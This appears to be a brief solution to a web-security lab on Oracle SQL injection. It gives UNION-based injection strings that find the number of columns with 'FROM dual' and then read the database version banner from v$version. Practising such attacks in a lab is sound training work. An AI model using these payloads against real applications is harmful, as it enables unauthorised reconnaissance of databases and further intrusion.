SQL injection attack, querying the database type a

SQL injection attack, querying the database type and version on Oracle

Solution

Checking number of columns

' UNION SELECT NULL FROM dual--
' UNION SELECT NULL,NULL FROM dual--

Display the database version

' UNION SELECT NULL,banner FROM v$version--